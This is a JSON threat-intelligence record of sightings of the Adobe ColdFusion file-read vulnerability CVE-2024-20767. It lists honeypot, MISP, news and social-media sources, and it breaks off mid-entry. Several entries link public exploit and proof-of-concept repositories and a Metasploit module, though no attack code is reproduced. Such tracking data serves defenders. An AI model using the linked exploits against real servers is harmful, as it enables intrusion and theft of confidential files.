{"vulnerability": "CVE-2024-2076", "sightings": [{"uuid": "4674eb44-37d0-483f-9709-f07e769d1e9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113663427165028505", "content": "", "creation_timestamp": "2024-12-16T16:24:20.127781Z"}, {"uuid": "ec04ba92-54cf-4c88-bb61-d9cbc2368916", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-12-16T18:10:02.000000Z"}, {"uuid": "d139e15c-55b3-4b0c-9003-99c343a11570", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2911368", "content": "", "creation_timestamp": "2024-12-16T18:28:13.129497Z"}, {"uuid": "15a18dc1-7472-4666-b935-e7e596596a52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "MISP/4a7f234b-f896-4d22-b213-7a15d4d5e49a", "content": "", "creation_timestamp": "2024-12-19T06:07:14.000000Z"}, {"uuid": "58efbc89-58fb-4403-9479-96bf7240c237", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "https://thehackernews.com/2024/12/cisa-and-fbi-raise-alerts-on-exploited.html", "content": "", "creation_timestamp": "2024-12-17T04:47:00.000000Z"}, {"uuid": "1c0087e1-017b-44c6-ba85-e43cfb3f39ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113705365085360059", "content": "", "creation_timestamp": "2024-12-24T02:09:42.059259Z"}, {"uuid": "20cd9abb-a2e8-4aa6-9fcf-f7aa344db257", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:46.000000Z"}, {"uuid": "089d71a9-1ab6-4820-b781-a75f703a20bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-02)", "content": "", "creation_timestamp": "2025-03-02T00:00:00.000000Z"}, {"uuid": "f2ea5354-6424-4929-96f8-6fb25883836f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:11:00.000000Z"}, {"uuid": "8c3c0b11-cc4d-4e67-ab1e-6a0d8dae557e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:11:02.000000Z"}, {"uuid": "da815f7a-014e-4561-8ef4-18f31e081f57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-07-16)", "content": "", "creation_timestamp": "2025-07-16T00:00:00.000000Z"}, {"uuid": "9d48d2a9-2c0f-47f2-aa8c-832b41c4a4e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-15)", "content": "", "creation_timestamp": "2025-07-15T00:00:00.000000Z"}, {"uuid": "42ce0842-4bdf-48ad-bf8c-caedb91148bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-31)", "content": "", "creation_timestamp": "2025-05-31T00:00:00.000000Z"}, {"uuid": "500292b3-db79-49b0-ba8b-c82e75a3c7e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-15)", "content": "", "creation_timestamp": "2025-05-15T00:00:00.000000Z"}, {"uuid": "930baee8-7f31-4dfa-b0a8-d8486939d05a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-07-24)", "content": "", "creation_timestamp": "2025-07-24T00:00:00.000000Z"}, {"uuid": "1f76de3d-fecf-40fc-aa46-99ed9ca22d63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:02.000000Z"}, {"uuid": "24797387-6012-4709-a017-76ecdacfe146", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-07-27)", "content": "", "creation_timestamp": "2025-07-27T00:00:00.000000Z"}, {"uuid": "377c3bf2-309c-40e4-ae4d-df9ac3da9f5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "https://bsky.app/profile/nimblenerd.social/post/3lv2cbmqipe2k", "content": "", "creation_timestamp": "2025-07-28T19:11:32.273648Z"}, {"uuid": "f769349c-edd8-408b-adf6-cf5b0b32def9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-09-15)", "content": "", "creation_timestamp": "2025-09-15T00:00:00.000000Z"}, {"uuid": "f4b1de2c-e3a7-4245-a088-58f615018f9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-09-08)", "content": "", "creation_timestamp": "2025-09-08T00:00:00.000000Z"}, {"uuid": "c5c3c163-8ba5-460d-913e-4d924d6bf884", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lv4ywrjfqy2n", "content": "", "creation_timestamp": "2025-07-29T21:02:24.555984Z"}, {"uuid": "8ccd1777-d7b7-4bc9-9d41-8e3c5145256a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-09-26)", "content": "", "creation_timestamp": "2025-09-26T00:00:00.000000Z"}, {"uuid": "890b1813-ccff-4d86-932e-b1001ef87b6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.rb", "content": "", "creation_timestamp": "2024-05-03T13:50:04.000000Z"}, {"uuid": "d4bcee68-b8fa-4f8c-9628-1a0bf8eea639", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "MISP/db121278-a8f5-4f36-a226-e45f3a86f55e", "content": "", "creation_timestamp": "2025-08-26T13:26:33.000000Z"}, {"uuid": "caabe211-2f02-4363-b7a2-f7678316c8a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-09-24)", "content": "", "creation_timestamp": "2025-09-24T00:00:00.000000Z"}, {"uuid": "47fc92d6-f7d3-4ced-9921-d89c40d5e62b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-12-23)", "content": "", "creation_timestamp": "2025-12-23T00:00:00.000000Z"}, {"uuid": "9ff2fe1f-2967-4b69-836c-64403b22fff9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-20767", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/bf32d8fb-7ccf-4bbe-ad72-a2b622c8af79", "content": "", "creation_timestamp": "2026-02-02T12:26:18.622687Z"}, {"uuid": "520c0ed6-5f90-48f2-b95b-119affa88b32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "https://bsky.app/profile/crowdsec.bsky.social/post/3mc7w6oygq22q", "content": "", "creation_timestamp": "2026-01-12T11:18:40.737173Z"}, {"uuid": "ddf49358-337b-4359-8e3a-f30703c5ea0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/hackingbra/102", "content": "#Exploit for #CVE-2024-20767 - #Adobe #ColdFusion\n\nhttps://github.com/yoryio/CVE-2024-20767\n\nhttps://github.com/Chocapikk/CVE-2024-20767", "creation_timestamp": "2024-03-27T12:06:16.000000Z"}, {"uuid": "f5d79328-6965-44fb-8812-0b25f6fa9f6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-06)", "content": "", "creation_timestamp": "2026-04-06T00:00:00.000000Z"}, {"uuid": "14d4c1cf-3a49-496b-9c02-c21f4a323948", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6855", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aExploit for CVE-2024-20767 - Adobe ColdFusion Server\nURL\uff1ahttps://github.com/yoryio/CVE-2024-20767\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-03-26T06:53:59.000000Z"}, {"uuid": "8bdd592c-a268-486b-92c8-74ceb6405158", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "exploited", "source": "https://t.me/itsec_news/4991", "content": "\u200b\u26a1\ufe0f\u042d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0432 \u0441\u0435\u0442\u0438: \u043e\u0448\u0438\u0431\u043a\u0430 \u0432 \u044f\u0434\u0440\u0435 Windows \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0440\u0435\u0430\u043a\u0446\u0438\u0438 \u0434\u043e 6 \u044f\u043d\u0432\u0430\u0440\u044f\n\n\ud83d\udcac CISA \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u043e \u0444\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u044b\u0435 \u0430\u0433\u0435\u043d\u0442\u0441\u0442\u0432\u0430 \u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u0437\u0430\u0449\u0438\u0442\u044b \u0441\u0438\u0441\u0442\u0435\u043c \u043e\u0442 \u0442\u0435\u043a\u0443\u0449\u0438\u0445 \u0430\u0442\u0430\u043a, \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u044f\u0434\u0440\u0430 Windows.\n\n\u041e\u0448\u0438\u0431\u043a\u0430 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2024-35250 (\u043e\u0446\u0435\u043d\u043a\u0430 CVSS: 7.8) \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u044b\u043c \u0440\u0430\u0437\u044b\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044f (Untrusted Pointer Dereference). \u041f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u043f\u0440\u0430\u0432\u0430 SYSTEM \u043f\u0440\u0438 \u043f\u0440\u043e\u0441\u0442\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445, \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u044e\u0449\u0438\u0445 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 DEVCORE, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0448\u0438\u0435 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0432\u0448\u0438\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u0432 Microsoft, \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u2014 Microsoft Kernel Streaming Service (MSKSSRV.SYS).\n\n\u041d\u0430 \u043a\u043e\u043d\u043a\u0443\u0440\u0441\u0435 Pwn2Own Vancouver 2024 \u043a\u043e\u043c\u0430\u043d\u0434\u0430 DEVCORE \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0438 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u043e\u0431\u043d\u043e\u0432\u043b\u0451\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Windows 11. Microsoft \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u043b\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0438\u044e\u043d\u044c\u0441\u043a\u043e\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f Patch Tuesday 2024. \u0427\u0435\u0440\u0435\u0437 4 \u043c\u0435\u0441\u044f\u0446\u0430 \u043d\u0430 GitHub \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u0440\u0430\u0431\u043e\u0447\u0438\u0439 \u043a\u043e\u0434 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, CISA \u0442\u0430\u043a\u0436\u0435 \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0430 \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 Known Exploited Vulnerabilities (KEV) \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Adobe ColdFusion, \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u0443\u044e \u043a\u0430\u043a CVE-2024-20767 (\u043e\u0446\u0435\u043d\u043a\u0430 CVSS: 7.4). \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430, \u0443\u0441\u0442\u0440\u0430\u043d\u0451\u043d\u043d\u0430\u044f Adobe \u0432 \u043c\u0430\u0440\u0442\u0435, \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0438\u0437-\u0437\u0430 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u043c \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0442\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u0438 \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c SecureLayer7, \u0443\u0441\u043f\u0435\u0448\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 ColdFusion \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u0439 \u043f\u0430\u043d\u0435\u043b\u044c\u044e \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043e\u0431\u043e\u0439\u0442\u0438 \u043c\u0435\u0440\u044b \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 \u0432 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435. \u041f\u043e\u0438\u0441\u043a\u043e\u0432\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430 Fofa \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442, \u0447\u0442\u043e \u0432 \u0441\u0435\u0442\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0431\u043e\u043b\u0435\u0435 145 000 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 ColdFusion, \u043e\u0434\u043d\u0430\u043a\u043e \u0442\u043e\u0447\u043d\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c\u0438 \u0430\u0434\u043c\u0438\u043d-\u043f\u0430\u043d\u0435\u043b\u044f\u043c\u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043d\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e.\n\n\u041e\u0431\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u044b \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 KEV \u0441 \u043f\u043e\u043c\u0435\u0442\u043a\u043e\u0439 \u043e\u0431 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438. \u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0434\u0438\u0440\u0435\u043a\u0442\u0438\u0432\u0435 BOD 22-01, \u0444\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u044b\u0435 \u0430\u0433\u0435\u043d\u0442\u0441\u0442\u0432\u0430 \u043e\u0431\u044f\u0437\u0430\u043d\u044b \u0437\u0430\u0449\u0438\u0442\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u0441\u0435\u0442\u0438 \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u0442\u0440\u0451\u0445 \u043d\u0435\u0434\u0435\u043b\u044c \u2014 \u0434\u043e 6 \u044f\u043d\u0432\u0430\u0440\u044f. \u0412 CISA \u043f\u043e\u0434\u0447\u0435\u0440\u043a\u043d\u0443\u043b\u0438, \u0447\u0442\u043e \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0447\u0430\u0441\u0442\u044b\u043c\u0438 \u0432\u0435\u043a\u0442\u043e\u0440\u0430\u043c\u0438 \u0430\u0442\u0430\u043a \u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u044b\u0439 \u0440\u0438\u0441\u043a \u0434\u043b\u044f \u0444\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b. \u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u043a\u0430\u0442\u0430\u043b\u043e\u0433 KEV \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d \u0434\u043b\u044f \u0433\u043e\u0441\u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0439, \u0447\u0430\u0441\u0442\u043d\u044b\u043c \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f\u043c \u0442\u0430\u043a\u0436\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043d\u0435\u0437\u0430\u043c\u0435\u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442 \u0442\u0435\u043a\u0443\u0449\u0438\u0445 \u0430\u0442\u0430\u043a.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2024-12-17T06:43:31.000000Z"}, {"uuid": "55d4f0a9-b872-4a05-b7ec-91038f48cd00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6860", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aExploit Toolkit for Adobe ColdFusion CVE-2024-20767 Vulnerability\nURL\uff1ahttps://github.com/Chocapikk/CVE-2024-20767\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-03-26T19:20:50.000000Z"}, {"uuid": "b7041297-947b-4c0c-a760-821189731541", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6859", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aProof of Concept for CVE-2024-20767. Arbitrary file read from Adobe ColdFusion \nURL\uff1ahttps://github.com/m-cetin/CVE-2024-20767\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-03-27T00:59:05.000000Z"}, {"uuid": "87b6f233-ed89-4425-8ee8-14dad062229b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "https://t.me/ap_security/520", "content": "#cve #exploit #poc\n\nCVE-2024-20767: Adobe ColdFusion\u2328\ufe0f\n\nCVE-2024-20767 \u2014 \u044d\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Adobe ColdFusion 2021 \u0438 ColdFusion 2023, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u0430\n\nExploit", "creation_timestamp": "2024-03-27T16:11:45.000000Z"}, {"uuid": "620de916-b7ec-48f8-ad78-4464ae15d2f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "Telegram/PjsrVBOSR9z9WVCgpdGaanfBtI34_q-CPUu0agZeTPfn", "content": "", "creation_timestamp": "2024-05-18T19:33:42.000000Z"}, {"uuid": "205361b6-6e04-46fe-9837-53122f13474d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/Kelvinseccommunity/24", "content": "https://github.com/yoryio/CVE-2024-20767\n\nExploit for CVE-2024-20767 - Adobe ColdFusion\n#github", "creation_timestamp": "2024-03-28T03:49:46.000000Z"}, {"uuid": "0a74e5cb-bad6-44a2-b0fd-062f314381cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": 